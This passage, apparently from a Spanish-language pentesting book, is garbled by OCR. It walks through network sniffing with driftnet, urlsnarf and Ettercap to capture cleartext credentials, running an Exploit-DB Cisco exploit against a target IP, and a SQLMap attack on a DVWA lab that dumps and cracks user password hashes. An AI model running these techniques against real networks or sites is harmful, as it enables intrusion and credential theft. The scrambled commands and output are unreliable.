imágenes que el objetivo está cargando, esto 
puede ser útil para reconocimiento adicional o 


potencialmente encontrar información confidencial. 
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pr -amuma -——re driftnet 





Interceptando URLs 
También puedes filtrar los paquetes por HTTP, y. ¡a 
pesar de que esto es bastante sencillo hacerlo en 
WireShark, existe una herramienta para hacerlo un 
poco más rápido, llamado urlsnarf, para utilizarla, 
deberás ejecutar el comando urlsnarf -i <interfaz> 
en tu terminal de Kali, en mi caso, ya que Mi 
interfaz es eth0, ejecutar el comando urlsnarf -i 
etho. 

Una vez ejecutado el comando, en la terminal se te 
mostraran los paquetes HTTP que muestran 


direcciones accedidas y por qué método HTTP. 
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|. "microsoft -Windows/10.0 UPnP/1,0" 


M.0-aad7-8522076742f9/WFADevice, xml AA == al 
102,168,1.83 - - [11/Aug/2018:03:54:55 -0500] "GET http://192.168.1.79:8060/ AMPA AG AW o i 
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o urlsnart -i ethd 


isnarf: Listening on ethO [tcp port 80 or port 8080 or port 3128] 

192,168,1.83 - - [11/Aug/2018:03:54:35 -0500] "GET http://192.168,1,254:1990/1d0a5510-cOfc-4( 
I .9-aad7-8522C76742f9/WFADevice,xml HTTP/1.1" - - "-" 
l07.168.1,83 - - [11/Aug/2018:03:54:35 -0500] "GET http://192,168.1,254:49152/gatedesc.xml H 
kp/1.1" - - "=" "Microsoft-Windows/10.0 UPnP/1.0" 


“Microsoft-Windows/10.0 UPnP/1.0"' 


97, 168.1.83 - - [11/Aug/2018:03:54:35 -0500] "GET http://192.168.1.79:8060/ ATTE 





192,168,1.83 - - [11/Aug/2018:03:54:43 -0500] "GET http://whitesuithacking.mx/ RIYA o o 


" "Mozilla/5.0 (Windows NT 10.0; Win64; X64) AppleWebKit/537,36 (KHTML, Like Gecko) Chrome/ 
o ,3440,106 Safari/537,36" 


li02.168.1.83 - - [11/Aug/2018:03:54:45 -0500] "GET http: //192.168,1.254:49152/gatedesc.xml H 
Ep11" - - *-" "Microsoft-Windows/10,0 UPnP/1.0 


1)92.168.1,83 - - [11/Aug/2018:03:54:45 -0500] "GET http://192.168.1,254;1990/1d0a5510-cOfc-46 


)-aad7-8522C76742f9/WFADevice.xml HTTP/1,1" - - "o" "Microsoft-Windows/10.0 UPnp/1.0" 
192,168.1,83 - - [11/Aug/2018:03:54:45 -0500] "GET http://192.168.1,79:8060/ IT 
 "Hicrosoft-Windows/10.0 UPNP/1,0" 

02.168.1.83 - - [11/Aug/2018:03:54:55 -0500] "GET http: //192,168.1.254:49152/gatedesc.xml H 
p/1.1% - - ©-" "Microsoft-Windows/10.0 UPnP/1.0" 

\92,168.1,83 - - [11/Aug/2018;03:54;55 -0500] "GET http://192,168.1,254:1990/1d0a5510-cofc-4¢ 
"Microsoft-Windows/10.0 UPnP/1,0" 





"Microsoft -Windows/10.0 UPnP/1,0" 


Interceptando credenciales no encriptadas 


Ahora, si alguien transmite credenciales no 
encriptadas en la red mientras tu estas 
interceptando, podrías buscar el método en 
WireShark para sacar las credenciales, sin 
embargo, Ettercap ya tiene esa función integrada, 
así que, si tu víctima entra a una página sin SSL, e 


ingresa credenciales, aparecerá en la consola de 
Ettercap. 


We 


i. 10:80 -> USER: usauriohackeado PASS: contrasenahackeada INFO: http:/ | mx/ + 
MEN} User_id=usauriohackeado&password=contrasenahackeada login=Login&action=login&new_loc= 
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Exploits 


Un exploit, a diferencia de un payload, es una falla 
por la cual se puede comprometer la seguridad de 
la información, podríamos decir que una 
vulnerabilidad es lo que permite que exista un 
exploit, por eso la gran mayoría de los exploits 
están basados en un CVE, y podrás encontrar 
exploits de CVEs muy seguido, aunque no todas 
las vulnerabilidades tienen exploits disponibles. 
Ahora, hay varias formas de utilizar exploits, ya que 
hay una enorme cantidad de estos, desde ataques 
para sistemas Linux o Windows, hasta para routers 
o televisiones, y cada uno tiene una forma y 
requisitos para utilizarse diferente, así que nos 
enfocaremos principalmente en como poder 
entender un exploit para poder utilizar cualquiera 
que queramos, aunque no conozcamos esa 


tecnología en particular. 


También existen lo que llamamos zero-day, estos 


son exploits que no han sico publicados, por lo 
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tanto, los fabricantes no han diseñado 
contramedidas contra estos, y son algunos de los 
ataques más peligrosos que existen, pero también 
de los más difíciles de conseguir, un zero day hoy 
en día para un sistema conocido podría venderse 
en miles o cientos de miles de dólares 


dependiendo de qué tan poderoso sea. 


Base de datos de Exploits 


Exploitdb, como su nombre lo dice, es una página 
web con una base de datos de exploits para 
diferentes tipos de sistemas, como esta hay varias 
fuentes, pero es una de las más grandes, para 


acceder a esta base de datos basta con ingresar a 


https://www.exploit-db.com/ . 


EXPLOIT = 
DATABASE 


Para encontrar un exploit aquí, basta con buscar en 


la barra del buscador el nombre del exploit, o el 
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CVE que esta explotando, por ejemplo, vamos a Hardware, significa que no se ejecuta en ni 
Inguna 


imaginar que en una auditoría el escáner te mostró Wi herramienta en específico como M tasploit 
| etasploit. 


| ilizan es vulnerable al CVE- : 
que el switch que utilizan u b Cisco Catalyst 2960 105 1 teseey 


‘ROCEM' Remote Code 





a Í Te MW . 
2017-3881, entonces buscarías en la sección de | Executión 
búsqueda el CVE. ti 

EDB-4D: 27125 Author, arteria Pubtihed:2017.ca:03 
CVE: 3347-3881 Type tarota SNE a r : pS 
i Aliases: NA Adwisory/Source: iik a de 
Search the Exploit Database | RS E Rican 
Search the Database for Exploits. Papers, and Shelicode. You can even search by CVE and OSVDB identifiers 
#:/usr/bin/python 
+ Author: 
# Artem Kondratenko (Bartkond) 
, a | import socket 
E-2017-3881 MINI t t j z 
CVE-2017.388 | m not a robo be . impor t Sys 
Fone Tamg 7| from time import sleep 


set_credless = True 


Te mostrará los exploits que existan para ese CVE, 
if len(sys.argv) < 3: 


y tendrás que hacer clic en uno, es común que 12 | print sy pe ; 
> 3 sys .argv[6] + [hast] --sët/--u l 
i ___sys.exit() 5 unset 


2 1 
' B 


exista más de uno para un solo CVE. 





Deter D A Y Title Platform : 
307.0412 @ + @ Cisco Catalyst 2960 105 12.2155)S€1 -'ROCEM' Remote Code Execution Hardware Debido a que no se ejecuta el código en Metasploit 
2017-04-12 -  Q Cisco Catalyst 2960 105 12.2055)5E1 -'ROCEM' Remote Code Execution Hardware descar gamos el código en el botón “download” a | 
| este punto notamos que es un script escrito b 
Al hacer clic nos mostrará el nombre del exploit, y Python, lo que significa que podrem 
alguna información, y en la parte inferior, el código, este lenguaje. Hay muchos tipos de clita en 
en este caso, podemos ver que en plataforma dice algunos podrán ser escritos en Python, JS y 
, JS, Java, 
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Ruby, etc, debes poder ejecutar y utilizar cualquier 
exploit que tengas que utilizar, es sencillo, 
simplemente busca la terminacion, y como 


ejecutarlo. 


42122.py Properties 


Permissions Open With 








Type: Python script (text/x-python) 
Size: 2.8 kB (2,841 bytes) 


Parent Folder: /root/Desktop 


Accessed: Mon 13 Aug 2018 03:00:30 AM CDT 
Modified: Mon 13 Aug 2018 02:59:47 AM CDT 


Para ejecutar el script, simplemente escribe el 
comando para abrir scripts en Python, y el nombre 
del archivo, que sería python 42122.py -h, el “-h” 
es para ver las opciones, una buena parte de los 


exploits tienen integrado comandos de ayuda como 
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E . ro E AS ST an 
Name: | 42122.py E | 
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h” o “-help”, así que úsalos al no saber cómo 





| utilizar un script (de lo contrario, lee el código). 


|. :~/Desktop# ls 
1112122. py 


12122. py [host] --set/--unset 


Y listo, a este punto podriamos utilizar este exploit, 
que nos permitira resetear los dispositivos 
vulnerables, por ejemplo, si mi objetivo estuviera en 
la IP 192.168.1.1, el comando sería python 
42122.py 192.168.1.1 -set 


'~/Desktop# python 42122.py 192.168.1.1 --set 


El punto aquí es que sepas que puedes utilizar 
cualquier exploit sacado de alguna base de datos 
| como exploit-db, y no depender de herramientas 


| como Metasploit para realizar ataques a sistemas. 
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:~/Desktop# python 4222 Py =h 





























Inyección SQL 

La inyección SQL es una de las vulnerabilidades 
mencionadas en el OWASP top 10 desde hace 
más de 10 años, y es porque sigue afectando a 


miles de páginas web y bases de datos. 


Esta vulnerabilidad se utiliza para atacar la 
seguridad de sistemas con información, como las 
bases de datos, en estas bases de datos, se 
inyectan comandos SQL en campos de entrada de 
datos de forma que se ejecuta código sin 


autorización en el servidor. 


La inyección SQL afecta a tantos sistemas debido 
a que puede estar presente en casi cualquier 


lenguaje de programación, sin embargo, depende 


de una vulnerabilidad en el software, que puede ser 


que la entrada no está correctamente filtrada, O 


cualquier falla en la que se permita ejecutar 


comandos de una entrada en vez de considerarlos 


un ‘string’ sin permisos de ejecución. 
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Por medio de esta vulnerabilidad se puede 


comprometer la integración de la información ya 


que es posible acceder a información confidencial 


y la disponibilidad e integridad, ya que es posible 
eliminar o cambiar la información, siendo una de 


las vulnerabilidades críticas más comunes de hoy 
en día. 


Laboratorio de práctica y cómo funciona 
SQLi 


Para realizar inyección SQL existen varias 
herramientas, pero pocas son tan buenas como 
SQLMap, para practicar esto, inyectaremos una 
pagina para prácticas que pueden encontrar en el 
sistema de OWASP-BWAP, para esto, inicien la 


máquina de OWASP-BWAP en su VMware o 
VirtualBox. 
(Es! OWASP Broken Web Apps VM v1.2 


Luego de esto, les aparecerá en la terminal la 


dirección donde puedes acceder a las páginas de 
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Prop y] 


la plataforma (en mi caso está en 192.168.1.66), y Aquí el apartado que nos interesa es el que se 


el usuario que es root, y la contraseña que es | llama “Damn Vulnerable Web Application”, 
owaspbwa aunque existen otras paginas en esta plataforma 
owaspdWap | 

donde podrán practicar esto. 


Bien, haz clic en el botón mencionado, y te llevara 


> Da L: p cf A EF, 
You can access the web apps atíhttp://192Z.166.1.6b,» 


a una página como la siguiente. 


You can administer / configure this machine through the console here, b 


to 192.168.1.66, via Samba at \\19Z.168.1.66\, or via phpmyadmin at 
http://192.168.1.66/phpnyadnin. 


Aquí el usuario y la contraseña son admin. 


AN 
DYW 


t, o Y . s EA 
, and password owaspbua”, 


AA 
In all these cases, you can use username! rool 





Ahora sí, vamos a entrar a la plataforma 





ingresando esa IP en el navegador. 


owasphwa 
OWASP Broheo Web (pphcatisas Projort U 5 e y na m e 


T fue WM pir the Gea Wah Agile mies (WAG Brokas Vith Appbeations peor tt 
s poir? ación == es Page 
he tee o a T aoee + IS A A e TAI is AR 


ES 


As MO sr py res Ve ELIO es 

= =e Password 
ORADE A Gal GAS? Yeho. NET 
RAASRESAPI fas che litorales CAS? MURAU 
PASP ta: RASP Bricis 
LANASP Sorrir tierpbrrd tot 
sagat Cade timon $ baart — ———— 
{oem Vee ad VaR Apia 


434 435 





















WHITE Sy; WHITE SUIT 


Al entrar, verán este panel, aquí podrán elegir 


varias formas de practicar vulnerabilidades en 








páginas y aplicaciones web. 


Lao 
LY, 








Welcome to Damn Vulnerable Web App! 





Damn Vulnerable Web App (DVWA) Is a PHP/MySQL web application that Is damn vulnerable. tts main q 
are to be an aid far security professionals lo test their skills and tools in a legal environment, help web > 
developers better understand the processes of securing web applications and aid teachers/students to 
teach/leam web application security in a class room environment 


usion A F } ; | poy. : 
WARNING! 4 ‘vce sotísal injection! mysal-sqhin 
Damn Vulnerable Web App Is damn vulnerable! Do not upload it to your hosting provider's public html folg jection (Blind ) 
any intenet facing web server as it will be compromised. We recommend downloading and installing ZA - A 








onto a local machine inside your LAN which Is used solely for testing 
Disclaimer 


We do not take responsibility for the way in which any one uses this application. We have made the p 
the application clear and it should not be used maliciously. We have given warnings and taken measured 
prevent users from installing OVWA on to live web servers. If your web server ls compromised via an Instal 
of DVWA it is not our responsibility it is the responsibility of the person/s who uploaded and installed i 


General Instructions 





The help button allows you to view hits/tips for each vulnerability and for each security level on thelr respectiy 
page. 


You have logged in as ‘admin’ 





Username: admin 
Security Level: low 


pre ase OO Ahora empezaremos con el ataque, lo primero que 
necesitamos saber siempre que realicemos un 


Una vez aquí, seleccionen la opción de “SQL | l , 
q p ataque de este tipo, es si necesitamos una sesión, 


Injection”, ya que es lo que practicaremos en esta : 
J 49 Mee? por ejemplo, en este caso, no podriamos entrar a 


seccion. | | 
este panel sin habernos autenticado con el usuario 


y contraseña “admin”, eso nos da una sesión, y 


436 | 437 









7 WHITE Supl 


esta se graba en lo que llamamos “cookie”, lo 


primero que haremos es obtener la “cookie”. 


Nota: Esto solo es necesario si se requiere una 
sesión, en páginas que no tienes que estar 
autenticado para acceder, esto es innecesario, 
no estorba, pero no es necesario. 


BurpSuite 


BurpSuite es una herramienta que nos sirve para 
explotación web, no es realmente necesario utilizar 
esta herramienta a fuerzas para interceptar las | 
cookies (hay otras herramientas más sencillas que 
pueden hacerlo), sin embargo, BurpSuite es una 
herramienta muy importante para el área de 
pentesting y explotación web, así que he decidido 
utilizar esta herramienta para interceptar las 


cookies. 








Primero, tenemos que entender que es BurpSuite, 
esta herramienta funciona como un proxy entre tu 
navegador y la página a la que quieres entrar, 
interceptando todos los paquetes enviados, esto te 
permitirá tanto ver cómo funciona una página web y 
que está mandando, como controlar qué paquetes 
y métodos pasan al servidor de la página web y 
cuáles no. 

Para abrir esta herramienta, puedes hacerlo 
escribiendo “burpsuite” en la terminal, o haciendo 


clic en el icono de este a la Izquierda en Kali. 





File Edit View Search Terminal Help 
:/# burpsuite 
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Vamos a seleccionar un proyecto temporal por el 
momento, aunque en una prueba de penetración 
probablemente preferirás guardar tu sesión como 
un proyecto. 
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Burp Suite Community Edition v1.7.36 > Luego options, y verificaremos la configuración del 


(2) Welcome to Burp Suite Community Edition. Use the options below to create or open a project BURPSU T proxy, en este caso está cor riendo en nuestro 


Note: Disk-based projects are only supported en Burp Suite Professional. COMMUNITY El ON 
ON 
UN 


localhost en el puerto 8080. 


@ Temporary project 

































| | Burp Suite Community Edition v1.7.36 - Temporary Project 
New prsject on disk Fite hi er Repeater Window Help > 2 o 
ame Repe: Seguencar Decoder Sompercr Extender Project options Y Usar options Alerts 1 
Target Proxy Spider Scanner intrud 
= a a = = er 
cent | HTTP history | WebSockets history | Options 
Open existing project Name = i File = — o 
f proxy Listeners 






Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your browser to use f the | | 
one of the list 















É Add | Running i Interface | Invisible i Redirect i Certificate 
== E] 127.0.0.1:8080 Per-host o | 





—— 
2 (Remove ) 





Pause Spider and Scanner 














Each installation of Burp generates its own CA certificate that Proxy | 
ME Ge nother testalizliór of burp y listeners can use when negotiating SSL connections. You can import or ex 


[import [ export CA certificate | | Regenerate CA certificate | 
Pq A o il et 


























$ intercept Client Requests 


Una vez iniciado, veras este panel, (como podras 






Use these settings to control which requests are stalled for viewing and editing in the Intercept tab. 


notar) tiene muchas funciones esta herramienta, - penen 
Ahora configuraremos nuestro navegador para que 





desde spiders, hasta ataques de fuerza bruta y mande todos los paquetes a ese puert t 
uerto, para esto, 


decodificadores, pero primero lo primero, vamos a 
abre el navegador (Firefox es el que está por 


configurarlo para funcionar con nuestro navegador, l 
l defecto), las opciones a la derecha, y haz clic en el 
así que seleccionaremos proxy. , 
nie i e anga = . e botón preferences. 
3 =: Burp Suite Community Edition vi.7.36 - Temporary Project = = o o0 


Burp Intruder Repeater Window Help 


Repeater Sequencer | Decoder | Comparer Extender Project options User options Alerts 
z Scanner intruder 


Target Proxy Spider 








-Site map | Scope 


Filter: Hiding not found Items; hiding CS9 image and general binary content. hiding 4xx responses: hiding empty folders fe 
= —— === E 
| : | Host | Method {| URL i Params Status | 
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P General E 
í Firefox Updates 

Q Search 
|. - aes | 


Keep Firefox up to date for the best performance, stabili 


ty, and security, | 
Q Privacy € Security Version 60.2.0esr (32-bit) What's new 


| E Signinto Sync 








| 
= Kali Linux distribution file 
2 A Firefox Account Kali - 1,0 
l ? Ctri+M Y. Automatically update search engines | 
G New Window E | 
E : : Ctri+Shift+ | 
| œ New Private Window Ctrl+Shift+P 


E] f 


v Use recommended performance settings Learn more 





za These settings are tailored to your computer's hardware and operating system, 

dr — (100%) + || baaa antes ee 
| FEER _— a Browsing 
| Edit x Cha ĝ Use autoscrolling i 
| Y Use smooth scrolling | 
| L ; b p > Always use the cursor keys to navigate within pages 
lil IDrary ShiFLLA Search for text when you start typing | 
2 Ctri+Shift+ | 
| $ Add-ons 
mL 
| 


| f Customize... 


D Firefox Support Configure how Firefox connects to the internet. Learn More 


Network Proxy Y | 
| 


Settings... 


Ahora selecciona en general, y la opción proxies, 


esta opción debe de estar en todos los 


Y ahora simplemente selecciona la opción manual 


proxy configuration, recuerda que debe estar 


navegadores, así que si usas otro navegador igual configurado en el mismo puerto que BurpSuite y en 


debes de poder hacer esto. el localhost. 
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o 
o 
Connection Settings Burp Suite Community Edition v1.7.36 - Temporary Project a 
ruder Repeater Window Help © o 
Sequencer Decoder | Comparer Extender | Projet opina = Up Ss 
j t Alerts 
Configure Proxy Access tothe Internet : sire Mc Scanner intruder 
Niti cent | HIEP history | WebSockets history | Options - e 
Auto-detect proxy settings for this network — = 
Use system proxy settings "Intercept is on 
e 1? i 
E | 





















© Manual proxy configuration 
EnS eN i san A s EA 


HTTP Proxy 127.0,01 












vV Use this proxy server for all protocols 


Y listo, ya está todo configurado, ahora cualquier 


1 Dro 177.00, Port 8080 
al GE Port 8080 cosa que mandes por tu navegador tendrá que 
CKS Host 127.0:9.1 Port $080 F 
> — pasar por BurpSuite, aqui hay dos botones 
No Proxy for importantes, el pri hind 
localhost, 127.0.0.1 p i DTO ii forward, que permitirá 
que los paquetes continúen su ruta normal drop 
Example: .mozilla,org, net.nz, 192.168.1.0/24 T ti | Pr , J 
Automatic prozy configuration URI q ois. CONSMONSS, y el código en la consola 
l z i : 
Reload E te dará la capacidad de editarlo si lo deseas 
Do not prompt for authentication if password is saved Ahora regresemos a la página de DVWA y 
Cancel OK 


Help 
metamos algo en el espacio, puedes poner lo que 


Ahora en BurpSuite vamos a irnos a la seccion | sea, en mi caso escribí un simple “1 
| , n simple “1”, 


intercept. 
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Vulnerability: 


Notaras que se queda cargando la página, esto es 


porque los paquetes están “detenidos” por 


ae ne 


BurpSuite, asi que vamos a la consola de : 
BurpSuite. 

Como podras notar, ahora nos aparece informacion 

en la consola, esto es referente a lo que se esta 
enviando a la pagina, desde aqui ya podemos ver 

la cookie, que es lo primero que buscabamos, 
seleccionada en rojo, vamos a copiarla y guardarla 


en una nota. 
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Cookie: ascurity=low; acopendlvida=awingwet, jot to, phpbb3 
PHPSESSTD=nk2Z0ber3: 7qcprgaeat9 jk i624 
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wseroent | HTTP history | WebSockets history | Options | 











(4) Request to http://192 168.1.66:80 





| Forward | i Drop = 


Raw Params | Headers Hex 


| intercept is on I] Action = 





aer ¿dvwa vulnerabil itien/eqli/?id=lésubmttesubmit HTrR/ | T 
pt: 192.168,1,66 

per-Agent: Mozilla/5,0 13131: Linux 1586; rv:60. 0) Gecko/230100191 Firefox/409.0 

ceept:s text htmi,application/ :html+xm1 ¿Application al:0q=0,%,+/1;q:0,8 

necept- Language: en-U5,en;q=6,5 

ccept-Encoding: gzip, deflate 

peferer: btrp://193,168,1.66 Jvwa/vulnerabilities/rali/ 


¿Tedmine; acgroupawi thperslet=nada: 





Upgrade: Insecure-Requesta: I 


Ahora lo que necesitas es la URL, esto lo puedes 
sacar de la barra de dirección siguiente, o haciendo 
clic derecho en la consola de BurpSuite, y 


seleccionando “copy URL”. 


Send to Spider 


Do an active scan 
Send to Intruder Ctri+1 
Send to Repeater Ctri+R 


Send to Sequencer 

Send to Comparer 

Send to Decoder 

Request in browser p 


Engagement tools [Pro version only] => Y 


Change request method 
Change body encoding 











Copy as curl command 
Copy to file 
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uss :/# sqlmap -u "http://192,168.1,66/dvwa/vulnerabilities/sqli/?id=18Submit=Submit" 
Luego de esto deberás tener en tu nota algo similar A MEA 
a esto: | ; | 
Cookie: security=low; PHPSESSID=nk20bsr3r7qcprgaeat9j k36s4 d Luego de presionar enter, la herramienta buscará 





$ ‘ e A , 74 - : Es Ri 
http://192.168.1.66/dvwa/vulnerabilities/sqli/?id y Submit por potenciales métodos vulnerables a inyección, 


hay que esperar un par de minutos a que la 


herramienta termine su trabajo. 


Inyección SQL (SQLI) - Practica 


A este punto, ya tenemos todo lo que buscábamos 0] testing connection to the target URL 


] checking if the target is protected by some kind of WAF/IPS/IDS 
] testing if the target URL content is stable 
] target URL content is stable 
] testing if GET parameter 'id' is dynamic 
IRWING] GET parameter 'id' does not appear to be dynamic 


f 
' 


IFO] heuristics detected web page charset 'ascii' 


: Li 
de BurpSuite, asi que ya podemos cerrarlo, y abrir | 


una terminal, en esta, vamos a utilizar una 3 


herramienta llamada SQLMap, esta herramienta 


| 
j 
z 


| 
Í 

i 

i 

l 
f 
i 


k 
i 

{f 

j 


| | 
) | 
6] 1 
1) 1 
Al l 
| f 
| | 


| 


/] [INFO] heuristic (basic) test shows that GET parameter ‘id’ might be injectable 
puede ser utilizada con mandarla llamar desde la | sible DBMS: 'MySOL") 
: /] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable t 
terminal y darle ciertos parametros. oss-Site scripting (XSS) attacks 





] [INFO] testing for SQL injection on GET parameter ‘id! 


La estructura es la siguiente, primero tenemos que 


llamar por nombre a sqlmap, luego, tenemos que 





Para cuando termine la herramienta (recuerda 


darle la bandera -u para darle una URL a donde presionar Y en lo que sea indicado y N si es 


i en este ! e E 
atacar, luego darle la URL en comillas, y innecesario), debería mostrar una pantalla similar a 


i Í e la daremos 
caso, es requerida la cookie, asi que s esta, mostrando las bases de datos disponibles 


Í | cookie entre al Y 
gonila bandera -opókle, saguiéo upa debido a que se confirmó la vulnerabilidad. 
comillas (recuerda que esto solo es necesario en 
páginas con autenticación), y posteriormente le 
pediremos algo, en este caso, le pediremos las 


bases de datos, con la bandera --dbs 
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57-52] [INFO] the back-end DBMS is MySQL sl Y en SQLMap se 
p puede pedir informació 
formación dentr 
O 


[02 
web server operating system: Linux Ubuntu 10,04 (Lucid Lynx) 


web application technology: PHP 5.3.2, Apache 2.2.14 d d 
back-end DBMS: MySQL >= 5.0 e una j 7 i 
[02:57:52] [INFO] fetching database names e esta jerarquia, o quienes están dentro de 


(02: 7:53] [ NFO] used SQL query returns 2 entries | esta E 
[02:57:53] [INFO] retrieved: information_schema | . En esta tabla están | > 
(02:57:53) [INFO] retrieved: dvwa 28 parametros. 


available databases [2]: | 
[*] dvwa , | 

[+] information schema Jerarquia | Pedir quien esta en 
02:57:52] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/192. 168 ) | esta jerarquia 


[02 
66' 
(*] shutting down at 02:57:53 Bases de 
A datos 













Pedir datos dentro 
de esta jerarquía 

















A este punto sabemos es vulnerable el sistema, 


que existen dos bases de datos, llamadas “dvwa” 


y “information_schema”. 


Luego de esto, vamos a robar información de estas *nota: -- son dos guiones. 
bases de datos, tomando de ejemplo a la que Se Esto es importante porque tenemos que seguir est | 
| uir esta 
llama dvwa, pero primero un poco de fundamento | estructura para pedirle a SQLMap que H 
nos dé 


3 
nformación, por ejemplo, ahora le diremos que nos 


de todas las tablas que están dentro de la base de 


de bases de datos. 





Las bases de datos se conforman de jerarquías, y | datos dvwa i 
: , para esto, diremos q 
' ue queremos 
van asl: sacar de la base de datos dvwa con la bandera -D 
- Base de Datos las tablas, con la bandera --tables | 
Sl Tablas ' iH sqlma HE Ly fe 
| p -u "http://192,168.1,66/dwa/ Tati 
ME a ToO ORANA Vulnerabilities/sql1/?1d=14Submit=Submit" 
- Columnas ¡ PHPSESSID=NK20bs1r3r70cprgaeat9jk3654" -D dvwa --tables as 
- Datos | 
| 


450 451 












Ahora podemos ver las tablas como resultados. 


Database: dvwa 
[2 tables] 





Ahora pediremos las columnas con la bandera -- 
columns dentro de la tabla con la bandera -T de 


users. 


:/# sqlmap -u 'nttp://192,168.1,66/dwa/vulnerabilities/sqli/21d=18Submit=Sul 
--cookle “security=low; PHPSESSID=nk20bsr3r7acprgaeat9]k3654" -D dvwa -T users --coly 





Y obtenemos un resultado. 


Database: dvwa 
Table: users 
[6 columns ] 


varchar(15) 
avatar varchar(70) 
first name varchar(15) 
last name varchar(15) 
password varchar (32) 








E ITE Sy 


JA salmap -u “http: //192.168,1,66/dvwa/vulnerabil 
okie "Security=low: 
word - -dump 
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Y finalmente, queremos los datos, sacados con la 
bandera --dump, de las columnas (pueden ser 


varias), user y password, con la bandera -C. 


En este caso las contraseñas están “hasheadas”, o 
encriptadas, por eso aparecen contraseñas tan 
complejas, así que dejaremos que SQLMap las 
desencripte usando un diccionario, así que al 
preguntar si queremos crackear las contraseñas 
vía un ataque de diccionario, seleccionaremos Y 
seguido de 1 para seleccionar el diccionario por 
defecto de SQLMap. 
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ities/sqli/?id=1&Submit=Submit" 
PHPSESSID=nk20bsr3r7qcprgaeat9jk3654" -D dvwa -T users 















used SOL query returns 6 entries 


heuristics 
retrieved: 
retrieved: 
retrieved: 
retrieved: 
retrieved: 
retrieved: 
retrieved: 
retrieved: 
retrieved: 
retrieved: 
retrieved: 
retrieved: 


detected web page charset ‘ascii’ 
1337 
8d3533d753ae2c3966d7e0d4fcc69216b 
admin 
21232f297a57a5a743894a0e4a801F C3 
gordonb 
e99418c428cb38d5f260853678922e03 
pablo 
0d107d409f5bbe40cade3de5c/1e9e9b7 
smithy 
5f4dcc3b5aa765d61d48327deb882cT99 
user 
eel1cbb19052e40b07aac0ca060c23ee 
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yatabase: dvwa 
| users 
M6 entries] 


—— eee 
=- e ss =» ss e ss ss ss ss e “aln - 
= - eee 
- =- — - 


8d3533d/5ae2c3966d7e0d4fcc69216b (charley) 
21232f297a5/7a5a/43894a0e4a801Fc3 (admin) 








7 any wen f AAA sa r n ie 7 y - 
A ew Sa » e < » `- > . ~ we Net ee Nw 
ae a A Aal Saa Laal 


[ 
| 
[ 
[ 
[ 
i 
[ ; , í 
103512:3 
(02:12:23 
[ 
[ 
[ 
[ 
[ 
[O 


i Ni recognized possible password hashes in column ‘password’ 
de you att to store hashes to a temporary file for eventual further processing with Othe, 
tools [y/N] E 


€99a18c428cb38d5f260853678922e03 (abcl123) 
0d107d409f5bbe40cade3de5c71le9e9b7 (letmein) 
5f4dcc3b5aa765d61d8327deb882cf99 (password) 
eel1cbb19052e40b07aac0ca060c23ee 


do you want to crack them via a dictionary-based attack? [Y/n/ql y 

[03:15:45] [INFO] using hash method 'md5 generic passwd’ 

what dictionary do you want to use? 

[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) 
[2] custom dictionary file 

TA with list of dictionary files 

> 1 








Aquí algo importante es que hayas puesto atención 





a la estructura de SQLMap, pero esta metodología 


Ahora esperaremos un par de minutos, en lo que la o : , 
puede ser utilizada con virtualmente cualquier 


herramienta crackear las contraseñas, podemos l p o. 
sistema que tenga la vulnerabilidad de SQLi, sin 


ver en la terminal como va avanzando. : 
embargo, úsala con cuidado, ya que esta es una 


cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03 

cracked password 'admin' for hash '21232f297a57a5a743894a0e4a801fc 

cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b' 

cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c7le9e9h7' 
0] current status: Lukie... N 


vulnerabilidad crítica aun relativamente común y 


explotarla contra sistemas sin autorización puede 





meterte en problemas reales. 





Y finalmente, nos entregará un resultado similar a Adicionalmente, te recuerdo que antes de hacer 


los anteriores, con los usuarios y contraseñas ya este ataque debes de haber identificado la 
en texto plano. vulnerabilidad en el paso dos de la metodología 


(análisis de vulnerabilidades). 
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Cross Site Scripting (XSS) 


Cross-Site Scripting, mejor conocido como XSS, es 
otra de las vulnerabilidades más comunes en 
aplicaciones web, al igual que la inyección SQL, 
permite ejecutar comandos, pero estos son del lado 
del cliente, en vez del lado de servidor o base de 
datos, esto significa que un atacante puede utilizar 
esta vulnerabilidad para atacar a todos los que 
visiten o utilicen un sitio web, desde inyectar código 
malicioso, hasta robar información de los clientes, 
además, es posible realizar ataques de defacing 
con esto, que afectaría seriamente a la 
organización comprometida en términos de 
reputación u otras maneras que afectan directa o 
indirectamente en el bolsillo o credibilidad de la 
organización. 

Esta vulnerabilidad aún es una de las más 
comunes y más graves, ha afectado hasta a 
organizaciones tan grandes como Twitter, 


Facebook, YouTube, entre otras. 
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Tipos de XSS 


Esta vulnerabilidad no existe en un solo “sabor”, 
hay varios tipos de ataques y vulnerabilidades XSS 
que pueden afectar en diferente forma a la 
seguridad de una página web. 

Hay más formas de XSS de las que hablaré, pero 


estas dos son las más comunes. 


Reflejada (no persistente) 


La versión no-persistente, o mejor conocida como 
reflejada de XSS es la forma más sencilla de esta 
vulnerabilidad. Velo así, imagínate 10 personas, 
incluyéndote, están viendo un monitor cada uno 
que muestra exactamente lo mismo para todos, y 
tú le avientas una pelota que hace que parpadee 
por unos minutos, y a las otras 9 personas les 
aparece eso exactamente igual que en tu monitor, 
pero si no sigues apuntando pelotas, el monitor se 


normaliza tanto para ti como para los demás. 


457 

















Así es como funciona esta vulnerabilidad, realizas 
el ataque y a todos les aparece, por ejemplo, 
podrías mandar a todos los que estén viendo una 
página en el momento que se ejecute código 
malicioso, o que los dirija a otro sitio, pero solo 


afectara en ese momento. 


Persistente (almacenada) 


Esta forma de XSS es mucho más devastadora, 
esto ocurre cuando el ataque hecho por el atacante 
se graba en el servidor, y se muestra 
permanentemente en las página o aplicación web. 
Esto puede dejar código malicioso corriendo 
indefinidamente en páginas web, afectando a todos 
los que visiten la página o mostrando información 


incorrecta, o hasta un defacing. 


Práctica: XSS 
Para practicar XSS, a pesar de que en DVWA hay 


una sección donde pueden practicar esto, me 


agrada más la interfaz y lo práctico (dado que no 
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necesitas ningún software o sistema adicional que 
un navegador) que es el juego de XSS de Google 


para entrar, dirígete a la URL https://xss- 


game.appspot.com/ . 


Una vez aquí, verás esta pantalla. 


Warning: You are entering the XSS game ares 


Welcome, recruit! 


Cross-site scripting (X55) bugs are one 
vulnerabilities in Web applications. 
to steal or modify user data in 


of the most common and danger 

